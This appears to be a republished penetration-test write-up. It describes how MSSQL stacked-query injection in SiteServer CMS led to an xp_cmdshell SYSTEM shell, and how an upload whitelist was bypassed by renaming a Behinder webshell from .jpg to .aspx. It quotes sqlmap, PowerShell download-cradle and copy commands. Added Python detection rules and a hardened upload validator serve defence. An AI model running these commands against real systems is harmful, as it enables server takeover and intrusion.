2025-01-19 Update. From: SLTechnology News&Howtos, Network Security
Shulou (Shulou.com) 05/31 Report
The editor would like to share an example analysis of an mssql injection plus a whitelist upload bypass on a host protected by 360. Most people are probably not familiar with this, so the article is shared for your reference; I hope you learn something from it. Let's get into it!
Information collection:
The site is built with Vue + ASPX on IIS 8.5. The login box shows a version number and the word siteserver appears in the URL, so it looked like a CMS build, although I had not seen this CMS before. A Google search showed that the site runs SiteServer CMS at the latest version, so the vulnerabilities published online could not be used here. After trying injection, weak passwords, CAPTCHA bypass, unauthorized access and similar tricks against the login box without result, and since a test account was already available, I simply logged in to the site and tested from there.
The picture is a login screenshot I found online; the red box marks the version number, shown in place of a CMS banner.
Functional testing:
After entering the back end, I browsed the functions briefly; most are page-management features, which I will not go through here. This article focuses on the injection point.
First, the upload points. There are many places to upload: avatars, ordinary doc files, the editor's upload. Testing showed that the upload function is restricted by a whitelist, so I decided to give up on the upload points. After all, even if a jpg can be uploaded, it cannot be parsed as a script because the IIS version is too recent. (Though I later read an article in which IIS 8.5 was actually exploited through a parsing vulnerability.)
Second, capturing the request of a "batch finishing" function.
The SQL injection test was carried out on the keyword parameter of the search point and an error message came back, so the captured request was saved and handed straight to sqlmap: python sqlmap.py -r 1.txt
The result: stacked queries are available and the database user has DBA privileges, so I used --os-shell directly, which enables xp_cmdshell and gives a shell. Running whoami showed that the current privilege is already the highest, NT AUTHORITY\SYSTEM. Happy days; with these findings plus a few other points written up, this penetration test could have ended here.
Entering the intranet:
But with such high privileges in hand, not going into the intranet would be hard to justify, and it looked like a simple job at first.
Start a VPS, bring up CS, generate a PowerShell payload, run it from os-shell and wait for it to check in. Instead, an error came back:
powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX ((new-object net.webclient).downloadstring('http://xxx:port/a'))")
The first thing was to check whether the machine had outbound access. Ping to the VPS and DNSLog both worked, so I tried running powershell through cmd instead:
cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX ((new-object net.webclient).downloadstring('http://xxx:port/a'))")
This reported the same error. I suspected a quoting problem, so I looked up cmd quote escaping with ^ on Baidu, but that did not help either.
Then the colleague next to me asked whether Windows Server 2012 R2 had a PowerShell execution policy set that blocks remote download and execution, so I used Get-ExecutionPolicy to check it and Set-ExecutionPolicy to open it up. The following is a local demonstration (I forgot to take a screenshot of the real environment):
Please refer to this article: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
In the real environment the PowerShell execution policy was modified successfully, but the command still would not execute. At that point it occurred to me that there might be antivirus software on the box, so I ran tasklist and found 360 protection running (no screenshot here).
The guess turned out to be right. The first idea was to bypass the antivirus. I had not had much contact with AV evasion tools, so I encoded the PowerShell command with http://jackson-t.ca/runtime-exec-payloads.html, but the result could not be used either. The alternative would have been to borrow a payload from someone else, which would trouble others.
Then I suddenly thought of using sqlmap to write a webshell to the server, but mssql has no equivalent of the mysql file-write function (later a colleague told me that sqlmap can also upload files in os-shell mode, a clever trick). Then I remembered that many of the function points I had just tested have file upload; it is whitelisted, but that does not stop me from uploading an image. So I uploaded a Behinder (ice scorpion) image webshell, bingxie.jpg, directly through the avatar upload, then used the copy command in os-shell to rename it: copy d:\abc\img\bingxie.jpg d:\abc\img\bingxie.aspx. Connecting with Behinder then succeeded straight away and the host was online. Done.
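The chain described so far (stacked-query injection under a DBA account, xp_cmdshell being switched on, SQL Server spawning cmd.exe, and a PowerShell download cradle launched with -ExecutionPolicy Bypass) leaves a very recognisable trail in database audit and process-creation telemetry. The following is an added example, not code from the original article: a small Python rule set run over constructed sample events (SQL audit statements and simplified Sysmon-like process records with an ancestry list; the host, port and paths are placeholders taken from the write-up). The ancestry check matters because the PowerShell process's immediate parent is cmd.exe, not sqlservr.exe.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry, not real logs: SQL statements in the shape a
# SQL Server audit records them, and process-creation events in a simplified
# Sysmon-like shape with an "ancestry" list (nearest parent first). The values
# mirror the steps in the write-up; host, port and paths are placeholders.
EVENTS: List[Dict] = [
    {"type": "sql", "login": "sa",
     "statement": "SELECT * FROM Content WHERE Title LIKE '%report%'"},
    {"type": "sql", "login": "sa",
     "statement": "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"},
    {"type": "sql", "login": "sa",
     "statement": "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"},
    {"type": "sql", "login": "sa",
     "statement": "EXEC master..xp_cmdshell 'whoami'"},
    {"type": "process", "image": "cmd.exe", "ancestry": ["sqlservr.exe", "services.exe"],
     "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "image": "powershell.exe", "ancestry": ["cmd.exe", "sqlservr.exe"],
     "cmdline": "powershell -NoProfile -ExecutionPolicy Bypass -Command "
                "\"IEX ((new-object net.webclient).downloadstring('http://xxx:port/a'))\""},
    {"type": "process", "image": "cmd.exe", "ancestry": ["sqlservr.exe", "services.exe"],
     "cmdline": "cmd.exe /c copy d:\\abc\\img\\bingxie.jpg d:\\abc\\img\\bingxie.aspx"},
    {"type": "process", "image": "powershell.exe", "ancestry": ["explorer.exe"],
     "cmdline": "powershell Get-ExecutionPolicy"},
]

# Detection patterns. Case-insensitive because T-SQL and cmd/PowerShell are.
XP_ENABLE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
XP_EXEC = re.compile(r"\bxp_cmdshell\b", re.I)
CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b", re.I)
POLICY_BYPASS = re.compile(r"-executionpolicy\s+bypass", re.I)
SCRIPT_RENAME = re.compile(r"\b(copy|move|ren|rename)\b.*\.(aspx?|ashx|asmx|cshtml)\b", re.I)
DB_ENGINES = {"sqlservr.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def sql_findings(statement: str) -> List[str]:
    """Flag xp_cmdshell being enabled (the higher-severity signal) or called."""
    if XP_ENABLE.search(statement):
        return ["xp_cmdshell enabled via sp_configure"]
    if XP_EXEC.search(statement):
        return ["xp_cmdshell executed"]
    return []


def process_findings(image: str, ancestry: List[str], cmdline: str) -> List[str]:
    """Flag shells descended from the database engine and cradle-style command lines."""
    out: List[str] = []
    # Walk the whole ancestry: powershell.exe launched via cmd.exe from
    # sqlservr.exe would be missed by a parent-only check.
    if image.lower() in SHELLS and any(a.lower() in DB_ENGINES for a in ancestry):
        out.append("shell descended from SQL Server process")
    if CRADLE.search(cmdline):
        out.append("PowerShell download cradle")
    if POLICY_BYPASS.search(cmdline):
        out.append("execution policy bypass flag")
    if SCRIPT_RENAME.search(cmdline):
        out.append("file copied/renamed to a server-side script extension")
    return out


def analyze(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (event index, finding) pairs for every rule that fires."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if ev["type"] == "sql":
            hits = sql_findings(ev["statement"])
        else:
            hits = process_findings(ev["image"], ev["ancestry"], ev["cmdline"])
        findings.extend((i, h) for h in hits)
    return findings


if __name__ == "__main__":
    for idx, finding in analyze(EVENTS):
        print(f"event {idx}: {finding}")
```

Any shell whose ancestry includes sqlservr.exe deserves an alert on its own; xp_cmdshell is disabled by default, so the sp_configure statement enabling it is the earliest and cheapest place to catch this chain, and the copy-to-.aspx rule covers the rename used later in the write-up.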
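The bypass at the end works because the upload check looked only at the file name, the file landed under the web root where IIS executes .aspx, and a later copy changed the extension. The following is an added example, not code from the article or from SiteServer CMS: a naive extension-only check beside a hardened handler in Python that sniffs magic bytes, rejects a JPEG with data appended after its EOI marker, assigns a random name whose extension comes from the detected type, and stores files under UPLOAD_DIR, an assumed directory outside the web root. The sample byte strings are constructed.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Assumed layout (not from the write-up): uploads are written under a
# directory outside the web root, so the web server never executes them,
# and the application streams them back by name. The path is a placeholder.
UPLOAD_DIR = "/srv/app-data/uploads"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAX_BYTES = 2 * 1024 * 1024

# Leading bytes that identify the image formats we accept.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Constructed sample payloads (not real files): a minimal JPEG skeleton, the
# same bytes with text appended after the EOI marker, and plain text named .jpg.
GOOD_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9"
APPENDED_JPEG = GOOD_JPEG + b"<!-- appended payload placeholder -->"
TEXT_AS_JPG = b"<!-- not an image at all -->"


@dataclass
class UploadResult:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None


def extension_of(filename: str) -> str:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return "jpg" if ext == "jpeg" else ext


def naive_check(filename: str) -> bool:
    """The kind of whitelist the write-up ran into: it trusts the name only."""
    return extension_of(filename) in ALLOWED_EXT


def sniff_type(data: bytes) -> Optional[str]:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def jpeg_has_trailing_data(data: bytes) -> bool:
    """Heuristic: a JPEG ends at its EOI marker (FF D9); anything after it is foreign."""
    end = data.rfind(b"\xff\xd9")
    return end == -1 or end + 2 != len(data)


def hardened_check(filename: str, data: bytes) -> UploadResult:
    if len(data) > MAX_BYTES:
        return UploadResult(False, "file too large")
    ext = extension_of(filename)
    if ext not in ALLOWED_EXT:
        return UploadResult(False, "extension not allowed")
    kind = sniff_type(data)
    if kind is None:
        return UploadResult(False, "content is not a recognised image")
    if kind != ext:
        return UploadResult(False, f"extension {ext} does not match content {kind}")
    if kind == "jpg" and jpeg_has_trailing_data(data):
        return UploadResult(False, "data appended after JPEG EOI marker")
    # The stored name is generated, never taken from the client, and its
    # extension comes from the sniffed type rather than the submitted name.
    return UploadResult(True, "ok", f"{secrets.token_hex(16)}.{kind}")


def storage_path(stored_name: str) -> str:
    """Resolve the on-disk location and refuse anything that escapes UPLOAD_DIR."""
    path = os.path.normpath(os.path.join(UPLOAD_DIR, stored_name))
    if os.path.dirname(path) != os.path.normpath(UPLOAD_DIR):
        raise ValueError("stored name escaped the upload directory")
    return path


if __name__ == "__main__":
    print(naive_check("bingxie.jpg"))                      # True: name alone passes
    print(hardened_check("bingxie.jpg", APPENDED_JPEG))    # rejected: trailing data
    print(hardened_check("photo.jpg", GOOD_JPEG))          # accepted, random name
```

The EOI check is only a heuristic: a payload carried inside a JPEG comment segment passes it, which is why re-encoding the image on the server and keeping uploads out of any script-executing path are the controls that actually hold. Once an attacker already has OS command execution through xp_cmdshell, as in this write-up, the rename itself is trivial; what decides the outcome is whether the renamed file sits somewhere IIS will run it.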
That is the whole of the article "An mssql injection + whitelist upload bypassing 360". Thank you for reading! I believe everyone now has some understanding of it; I hope the content shared helps you, and if you want to learn more, you are welcome to follow the industry information channel.